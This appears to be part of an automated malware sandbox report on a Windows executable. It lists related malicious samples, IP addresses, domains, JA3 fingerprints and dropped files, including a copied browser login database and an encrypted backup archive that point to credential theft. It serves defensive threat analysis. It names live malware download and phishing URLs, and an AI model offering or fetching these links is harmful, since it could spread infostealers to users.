                                                                                                                                                                                                                          fpY3HP2cnH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                          4287eV6mBc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                          172.65.251.78build_setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                          • gitlab.com/greg201/ppi3/-/raw/main/Setup.exe?inline=false

                                                                                                                                                                                                                          Domains

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          gitlab.com#U2800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          hnskdfgjgar22.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          hnsadjhfg18De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          slifdgjsidfg19.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          De17De16.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          fghdsdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          hnghksdjfhs19De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          jhsdgfjkh236.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          kjhsdgGarmin17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          hngadsfkgj17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          bg.microsoft.map.fastly.netpdf_2025 QUOTATION - #202401146778.pdf (83kb).com.exeGet hashmaliciousPureLog Stealer, QuasarBrowse
                                                                                                                                                                                                                          • 199.232.214.172
                                                                                                                                                                                                                          PO 2025918 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                                                                          1579614525244583223.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                                                                          New purchase order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                                                                          35491083472324549.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                                                                          • 199.232.214.172
                                                                                                                                                                                                                          28236151432955330765.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                                                                          ProductBOMpq_v4.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 199.232.214.172
                                                                                                                                                                                                                          17201670993971103.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                                                                          • 199.232.214.172
                                                                                                                                                                                                                          Scanned-IMGS_from NomanGroup IDT.scr.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                                                                          12.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 199.232.214.172
                                                                                                                                                                                                                          api.ipify.org6kK89mR2aq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                                                                          #U2800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.26.13.205
                                                                                                                                                                                                                          009.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                          • 104.26.12.205
                                                                                                                                                                                                                          http://bebizicon.com/Campususa/index.xml#?email=b2xpdmllci5kb3phdEBpbm5vY2FwLmNvbQ==Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                                                                          https://runescape.games/usernames.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.26.13.205
                                                                                                                                                                                                                          rRef6010273.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                                                                          invnoIL438805.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                                                                          Shipping Docs Waybill No 2009 xxxx 351.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                          • 104.26.13.205
                                                                                                                                                                                                                          rCHARTERREQUEST.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                          • 104.26.12.205
                                                                                                                                                                                                                          http://clumsy-sulky-helium.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.26.12.205

                                                                                                                                                                                                                          ASNs

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          CLOUDFLARENETUSzbROZPjAQ7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.26.12.205
                                                                                                                                                                                                                          6kK89mR2aq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                                                                          #U2800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.26.13.205
                                                                                                                                                                                                                          http://www.pentamx.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                                          • 1.1.1.1
                                                                                                                                                                                                                          PO 2025918 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          ABG Draft.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                          • 104.21.64.1
                                                                                                                                                                                                                          RENH3RE2025QUOTE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                          • 104.21.80.1
                                                                                                                                                                                                                          https://web.oncentrl.com/#/index/action?entityType=PUBLISHEDQUESTIONNAIRE&entityId=134955&actionType=PUBLISH&context=CLIENT_MGMT&recieverUserInfoId=68822Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.17.25.14
                                                                                                                                                                                                                          random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.96.1
                                                                                                                                                                                                                          https://akirapowered84501.emlnk.com/lt.php?x=3DZy~GDLVnab5KCs-Nu4WOae1qEoiN9xvxk1XaPMVXahD5B9-Uy.xuG-142imNHGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.17.205.31
                                                                                                                                                                                                                          TUT-ASUS6kK89mR2aq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          #U2800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          rordendecompra_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          findme.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          tasAgNgjbJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          Solara.exeGet hashmaliciousPython Stealer, Exela Stealer, XmrigBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          resembleC2.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          F0DgoRk0p1.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          fpY3HP2cnH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          4287eV6mBc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          CLOUDFLARENETUSzbROZPjAQ7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.26.12.205
                                                                                                                                                                                                                          6kK89mR2aq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                                                                          #U2800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.26.13.205
                                                                                                                                                                                                                          http://www.pentamx.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                                          • 1.1.1.1
                                                                                                                                                                                                                          PO 2025918 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          ABG Draft.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                          • 104.21.64.1
                                                                                                                                                                                                                          RENH3RE2025QUOTE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                          • 104.21.80.1
                                                                                                                                                                                                                          https://web.oncentrl.com/#/index/action?entityType=PUBLISHEDQUESTIONNAIRE&entityId=134955&actionType=PUBLISH&context=CLIENT_MGMT&recieverUserInfoId=68822Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.17.25.14
                                                                                                                                                                                                                          random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.96.1
                                                                                                                                                                                                                          https://akirapowered84501.emlnk.com/lt.php?x=3DZy~GDLVnab5KCs-Nu4WOae1qEoiN9xvxk1XaPMVXahD5B9-Uy.xuG-142imNHGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.17.205.31

                                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          3b5074b1b5d032e5620f69f9f700ff0ezbROZPjAQ7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          • 142.250.186.100
                                                                                                                                                                                                                          • 172.217.16.206
                                                                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                                                                          6kK89mR2aq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          • 142.250.186.100
                                                                                                                                                                                                                          • 172.217.16.206
                                                                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                                                                          #U2800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          • 142.250.186.100
                                                                                                                                                                                                                          • 172.217.16.206
                                                                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                                                                          pdf_2025 QUOTATION - #202401146778.pdf (83kb).com.exeGet hashmaliciousPureLog Stealer, QuasarBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          • 142.250.186.100
                                                                                                                                                                                                                          • 172.217.16.206
                                                                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                                                                          12.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          • 142.250.186.100
                                                                                                                                                                                                                          • 172.217.16.206
                                                                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                                                                          https://cys-bombasml.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          • 142.250.186.100
                                                                                                                                                                                                                          • 172.217.16.206
                                                                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                                                                          UoEDaAjHGW.exeGet hashmaliciousPureLog Stealer, QuasarBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          • 142.250.186.100
                                                                                                                                                                                                                          • 172.217.16.206
                                                                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                                                                          009.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          • 142.250.186.100
                                                                                                                                                                                                                          • 172.217.16.206
                                                                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                                                                          RFQ.exeGet hashmaliciousQuasar, PureLog StealerBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          • 142.250.186.100
                                                                                                                                                                                                                          • 172.217.16.206
                                                                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                                                                          PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          • 142.250.186.100
                                                                                                                                                                                                                          • 172.217.16.206
                                                                                                                                                                                                                          • 172.67.74.152

                                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          C:\Users\user\Desktop\e_sqlite3.dll#U2800.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                                            C:\Users\Public\Documents\638724340890071225\Default_LoginDataTemp.db

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):51200
                                                                                                                                                                                                                            Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\Public\Documents\638724340890071225\Files\D\hwcompat.txt

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):751624
                                                                                                                                                                                                                            Entropy (8bit):4.941596949315087
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:5CgixLwQcUHW0tKouM4kD+nRzkSv9N+VYuhras4V:AgixLIUHW0tK7MmkSv9w/tas4
                                                                                                                                                                                                                            MD5:FBF37B8B1EE4640B1C470F2F07A80E4A
                                                                                                                                                                                                                            SHA1:B239C5499FA63D397C3DD35A7F605CE86D91B44B
                                                                                                                                                                                                                            SHA-256:E21DB717F31F9465420E6354BAA5AFAEAA3521DEB885ED46BC90530AEE9FFD20
                                                                                                                                                                                                                            SHA-512:F9439E2D7B63825FE812EE380F1EF8B277D50EED706B6ABE4B8563423891FF425A00083E88626084EE493376F1DA742ECD73B6B5F892E001C4F9048C7D3AC36C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                                                            Preview:HwCompat V4....1394.inf:..PCI\CC_0C0010..PCI\VEN_10CF&CC_0C0010..PCI\VEN_11C1&CC_0C0010..PCI\VEN_100B&DEV_000F..PCI\VEN_100B&CC_0C0010..PCI\VEN_1033&DEV_0063..PCI\VEN_1033&CC_0C0010..PCI\VEN_1180&CC_0C0010..PCI\VEN_104D&DEV_8039..PCI\VEN_104D&DEV_8039&REV_03..PCI\VEN_104C&DEV_8009..PCI\VEN_104C&DEV_8019..PCI\VEN_104C&CC_0C0010..PCI\VEN_104C&DEV_8009&SUBSYS_8032104D..PCI\VEN_1106&DEV_3044..PCI\VEN_1106&CC_0C0010....3ware.inf:..PCI\VEN_13C1&DEV_1010&SUBSYS_000113C1....55fpgafirmware.inf:..UEFI\RES_{C907D5F6-BBE9-47EE-B76B-5E28C7F9FC63}....55niosfirmware.inf:..UEFI\RES_{06B75ADA-B0E1-46BA-BB3B-4D6E4A0F2CB1}....55smcappfirmware.inf:..UEFI\RES_{364D032C-0041-48A6-A26F-62388D97FC6C}....55smcbootfirmware.inf:..UEFI\RES_{DA50CBA0-8F33-4B66-8A3A-08F84015C33F}....55stguestfirmware.inf:..UEFI\RES_{4E11B2F5-AF26-49D5-A549-72AE52345E22}....55stoutfirmware.inf:..UEFI\RES_{7E2BEABF-4BE5-4C10-AF9C-4C1A69E06033}....55stpcfirmware.inf:..UEFI\RES_{296EFE23-EB18-42EE-8B12-51489B27232A}....55sttouchbackgue

                                                                                                                                                                                                                            C:\Users\Public\Documents\Backup_[United States]_8.46.123.189_[1401].zip

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):95768
                                                                                                                                                                                                                            Entropy (8bit):7.998195297953456
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:1536:7dlaJdOOioTKb0XCpD27+NlzPJ+DWWwTeEeFvdb6oqV7EX0ox4SfiJGfFNbrTDTK:7dKioub0XsDi+zJIwTZ6bnqQAZ2frfTK
                                                                                                                                                                                                                            MD5:17C4723854E7A7255FA12454B95FB9AE
                                                                                                                                                                                                                            SHA1:4ADB6C6297A91BBB347332C20EA8FF4EA16E119B
                                                                                                                                                                                                                            SHA-256:3A540FFF429B06B7D32C4BE8793B996557BF3DD4E3BA566EB3C34971A4781AAE
                                                                                                                                                                                                                            SHA-512:11AE8EE7C3B7B85F420A8B9042613E5126A888DA5439D334E23C0E0D929957A9A9DC46997FD72DC70980BDE1514898150A8D676B324EE9A16B1E02C920390948
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:PK..-......6.Z.8n~............D/hwcompat.txt.....x......Zu.......Sj$c.F.{&.w....EA...u..{5U|O.\{3r.....-..5.......ysB...{.UC..r.Gg.p.;...9$...E1sj5...D..I....de...`.-z..V.rt8-.z.x.......BzB.N..=3.B.9..f..`N..Z.......E0....#.l..ep..w.N..:d.l.o..c.c.....$.x.?'.`.....r.zm..Hgp.S..F[.T<.p..}...M.M..n....`bk......Ui..na"0t....._O:.l.kI._........,.Jh.x]...2...qT....Y..0.....`...P.8.,.4W....YL)......CM.B..5m. =.q...7Cw............A...sq....;..2..........\..,.8.0d...X...a.4a..P6+.b..`... .......e:...N...i]L..KT...ta.gZ......~.-.xa...f.......bMsK....3...y.....B........Bj..n{......"z.......f..m.~...^......rNA..'g.tN..E....d%f]]...G^C..g.....Cx.poIWJ..~........|.....W....`.G<t`}mn'.|..:E*5"t...s..e.A...n...........}..{..;.Q..D.(..g.9.Q.S.i...=h.g...=.,^..Dc.....E1...N........mL\...1t.@K?~..i.6..*..6..........Ij.M.U.v$.SO{........k.#...........x...c&.X'_..;HV...(6.#'#....6p]......1.-.1....^"..A...!0g...l.m3.....Q.N......nf.....uY.P..0+..Lct.

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):280
                                                                                                                                                                                                                            Entropy (8bit):4.16517681506792
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:FiWWltlrPYjpVjP9M4UcLH3RvwAH/llwBVP/Sh/Jzv/jSIHmsdJEU9VUn:o1rPWVjWZq3RvtNlwBVsJDL7b/3U
                                                                                                                                                                                                                            MD5:63E35E03D1A718162EB721D779A00FE3
                                                                                                                                                                                                                            SHA1:92CDFBF49150F2F3F61438CDCB191E390B14E65E
                                                                                                                                                                                                                            SHA-256:422FA3D3220B8DCB65BE4ED2E2FBD7571B98EE2301E1D2FA86C937060391F148
                                                                                                                                                                                                                            SHA-512:9A436CC336F34BB269C8917F0322816FC63DEC63016CB292B25DA724C26D6EB8F72501F3C979C23842FFAA09B76DDA954ED05EBCB4F2FE7619D2DA14F8690EC4
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:sdPC.....................!...W.F....+F."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................8889edf7-b09d-4a45-9ea5-adabbfd01bb9............

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\DevToolsActivePort

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):59
                                                                                                                                                                                                                            Entropy (8bit):4.3825838381073
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:hRvatSuy62SacsB1DzFy:nvs5B18JzY
                                                                                                                                                                                                                            MD5:66A2A3B8DEF19A9397C20EC304A995F7
                                                                                                                                                                                                                            SHA1:FC133946F7A9CE35FBC9460E42D7D0609ECE6A0F
                                                                                                                                                                                                                            SHA-256:AAF3FB5786A472A97883988DC842138491D8E8B3A282953492323371121D56D5
                                                                                                                                                                                                                            SHA-512:97A762F22FF1DB8927571847CCAEC9C7154C686262C7B9B2CFAC054BB492BFFEF5118A01C0C80D5C11CA9CA182A04AE564DAD36FCFAC02FE0873B579DA3CF708
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:9568./devtools/browser/006eee72-8a99-4691-90d3-6f0f8552b96d

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\msoFBB0.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 15 x 15
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):663
                                                                                                                                                                                                                            Entropy (8bit):5.949125862393289
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
                                                                                                                                                                                                                            MD5:ED3C1C40B68BA4F40DB15529D5443DEC
                                                                                                                                                                                                                            SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
                                                                                                                                                                                                                            SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
                                                                                                                                                                                                                            SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp2i5k3b.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):51200
                                                                                                                                                                                                                            Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp3nlxxg.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1611), with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1611
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkf:YJ
                                                                                                                                                                                                                            MD5:4C0B950A3BF9C8A3E2C0BCB15DC2B519
                                                                                                                                                                                                                            SHA1:C7E9FD64C577AB0E7C2AA6A700D56300F1B688CC
                                                                                                                                                                                                                            SHA-256:401471AE4DA2D65368A2F3B48DE1BF19CED759DF5403599B898EC76830F14A79
                                                                                                                                                                                                                            SHA-512:30E36CDEC425FDD0B7C41C6209D09354CACFE5186765CAD58B07A02FC35265590F7C003D6DFAA3C0C198123C9B92989497200AEC987AC1D567536675BDAE7F36
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp4skspg.tmp

                                                                                                                                                                                                                            Download File
